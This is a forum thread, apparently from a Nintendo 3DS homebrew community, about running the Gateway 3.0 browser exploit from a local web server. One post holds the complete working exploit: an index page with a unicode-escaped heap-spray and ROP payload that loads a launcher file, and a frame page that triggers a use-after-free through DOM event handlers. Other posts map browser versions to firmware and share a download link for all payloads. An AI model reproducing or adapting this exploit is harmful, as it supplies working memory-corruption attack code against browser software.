Hacking [Attempt] Running GW3.0 Web Exploit on a Local Network

[Arkansaw]

Here: http://gateway-news.tk/ow_gateway/ua.php

cool...this could use a shortener though

 

[liomajor]

Here is the information for user agent strings and versions currently existing: http://3dbrew.org/wiki/Internet_Browser

 

[VeryCrushed]

cool...this could use a shortener though

lol im working on a lot of things on that site, everything will have a nice little page on my site in a few

 

[Duo8]

Can someone send me their files. Preferably someone with browser 1.7567.US

 

[liomajor]

Currently there are 3 Versions (Region doesn't seem to matter):

3DS Browser Version 1.7498 For Firmware 4.0.0-4.5.0 > Mozilla/5.0 (Nintendo 3DS; U; ; de) Version/1.7498.EU
3DS Browser Version 1.7552 For Firmware 5.0.0-7.0.0 > Mozilla/5.0 (Nintendo 3DS; U; ; de) Version/1.7552.EU
3DS Browser Version 1.7567 For Firmware 7.1.0-16    > Mozilla/5.0 (Nintendo 3DS; U; ; de) Version/1.7567.EU

 

[ken28]

Can someone send me their files. Preferably someone with browser 1.7567.US

seme here just for eu

 

[KazoWAR]

Can someone send me their files. Preferably someone with browser 1.7567.US

Spoiler

index

<html>
<head>
<style>
body {
color:white;
background:black;
}
 
 
</style>
<script>
function magicfun(mem, size, v) {
var a = new Array(size - 20);
nv = v + unescape("%ucccc");
for (var j = 0; j < a.length / (v.length / 4); j++) a[j] = nv;
var t = document.createTextNode(String.fromCharCode.apply(null, new Array(a)));
 
mem.push(t);
}
 
function dsm(evnt) {
   var mem = [];
 
for (var j = 20; j < 430; j++) {
magicfun(mem, j, unescape("\u57c4\u0010\u57c4\u0010\u57c4\u0010\u57c4\u0010\uc2fc\u0010\u50b3\u0010\uca34\u0019\u85f0\u08b8\u8008\u0018\ua00c\u001d\u46eb\u0019\u0000\u08f1\u8630\u08b8\u0001\u0000\ub020\u0039\uc01c\u001c\u6010\u002c\ufe0c\u0022\u1ff0\u0023\ubff0\u002c\u4000\u0012\udff4\u0033\u57c4\u0010\uc2fc\u0010\ua000\u0001\u8af4\u0022\u0004\u08f1\u7334\u0010\uc024\u001c\u46eb\u0019\u0000\u08f1\u0020\u08f1\u1000\u08f0\u4000\u0000\u5ff8\u0029\u3ffc\u0025\u86e0\u0016\ue030\u002b\u2010\u0021\u1f40\u0027\uc05c\u0020\ue0c4\u002d\u2000\u001b\uc2fc\u0010\u850c\u08b8\ubacc\u0011\u57c4\u0010\u8af4\u0022\u8281\ud582\u0658\u0035\udd48\u0011\u8af4\u0022\u850c\u08b8\u7334\u0010\u4850\u0035\uc2fc\u0010\u8618\u08b8\ubacc\u0011\u7f6d\u0012\u014c\u0010\u37e0\u0010\u848c\u08b8\u840c\u08b8\ubacc\u0011\ubb00\u0011\u57c4\u0010\u8af4\u0022\u0000\u0000\u0658\u0035\u03a0\u0013\u65a8\u0010\u1434\u0010\uff64\u0022\u03a0\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0b5c\u0010\ufe44\u0022\u57c4\u0010\u5ae0\u002c\u57c4\u0010\u8af4\u0022\u0658\u0035\u57c4\u0010\u2c93\u0018\uc2fc\u0010\u8618\u08b8\ubacc\u0011\udd48\u0011\u6694\u0010\u6694\u0010\u8af4\u0022\u0004\u0000\u0658\u0035\u0344\u0013\u8af4\u0022\u8618\u08b8\u7334\u0010\u0d24\u0010\u8af4\u0022\ub000\uf70f\u0658\u0035\u9864\u0011\u1a8c\u0015\u59c0\u0020\uc2fc\u0010\u8610\u08b8\u8af4\u0022\u0ffc\u08f0\u6694\u0010\u5fd4\u0035\u8af4\u0022\u84a8\u08b8\ufc24\u0010\u2215\u002c\u57c4\u0010\u57c4\u0010\u65a8\u0010\u5654\u002d\u3778\u0010\ua864\u002f\u9b94\u0011\ue780\u0020\u8605\u0012\u3da8\u0010\u85f8\u08b8\u57c4\u0010\u5ae0\u002c\udf28\u0010\uc8e4\u002f\u37e0\u0010\uc494\u0023\u0358\u0013\u1000\u08f0\u0344\u0013\u8400\u08b8\u57c4\u0010\u57c4\u0010\u0344\u0013\u0064\u006d\u0063\u003a\u002f\u004c\u0061\u0075\u006e\u0063\u0068\u0065\u0072\u002e\u0064\u0061\u0074\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0344\u0013\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000"));
}
}
</script>
</head>
<body>
        <h1 align="center">GATEWAY 3DS LOADING...</h1>
        <iframe width=0 height=0 src="frame.html"></iframe>
</body>
</html>

frame

<html>
<head>
<script>
var nb = 0;
function handleBeforeLoad() {
if (++nb == 1) {
p.addEventListener('DOMSubtreeModified', parent.dsm, false);
} else if (nb == 2) {
p.removeChild(f);
}
}
 
function documentLoaded() {
f = window.frameElement;
p = f.parentNode;
var o = document.createElement("object");
o.addEventListener('beforeload', handleBeforeLoad, false);
document.body.appendChild(o);
}
 
window.onload = documentLoaded;
</script>
</head>
<body>
KEKEKEKEK...
</body>
</html>

 

[felystar]

So just use flashget to get the index.htm and using my 3DS agent and then creating a local server will make it work? Anyway to create a server on Android so that I don't need my computer every time I wanna play? I may be away from home

 

[VeryCrushed]

If someone can gather up all the files for the various versions and send them in a PM to me that would be great, i havent slept at all the past 50 or so hours and am dying for some sleep.

My site has been updated with that sexy dragon too x)

 

[Duo8]

Ugh still not working.

Can someone zip and send me their html files?

 

[Falo]

the region doesn't matter, i made a simple c# app to download all of the different payloads and only the version string matters.

fw 2.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.US"
fw 2.1-3.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7498.US"
fw 4.0-4.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7455.US"
fw 5.0-7.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7552.US"
fw 7.1-9.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US"

so there are 5 different payloads.
here the payloads in html and as binary dat:
http://www.mediafire.com/download/2pd0p3htica8c4n/gateway30_payloads.7z

 

[felystar]

Now anyone can share the html for every payload? I would of I could but I'm studying right now

 

[Duo8]

OK it's working now. Apparently encoding matters.

 

[felystar]

Is there any way to open that html file in the 3DS web browser?
Without an internet connection, because even if you create a local server you will need a network to connect your 3DS too, so maybe there is a way to copy the html file using a file explorer inside of 3DS bookmarks. Changing the address to something like smc://index.htm or whatever is the root of the SD card

 

[liomajor]

Here is how it works:

 

[felystar]

Here is how it works:

Oh upload that server's data and share it please. It will be very helpful in case we don't have internet or Gateway's site is overloaded o.O

 

[Shadowtrance]

Someone already did upload it, look a few posts up...

 

[darkraider2009]

the region doesn't matter, i made a simple c# app to download all of the different payloads and only the version string matters.

fw 2.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7412.US"
fw 2.1-3.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7498.US"
fw 4.0-4.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7455.US"
fw 5.0-7.0 = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7552.US"
fw 7.1-9.X = "Mozilla/5.0 (Nintendo 3DS; U; ; en) Version/1.7567.US"

so there are 5 different payloads.
here the payloads in html and as binary dat:
http://www.mediafire.com/download/2pd0p3htica8c4n/gateway30_payloads.7z

shadow was faster.

felystar ....

 

[liomajor]

Oh upload that server's data and share it please. It will be very helpful in case we don't have internet or Gateway's site is overloaded o.O

Its offline, you could also use your mobile hosting theese files if you are not @ home

 

[felystar]

shadow was faster.

felystar ....

Wait that includes the html file of the exploit? I didn't notice :oops: LOL Studying physics right now hahaha so no time to think anything else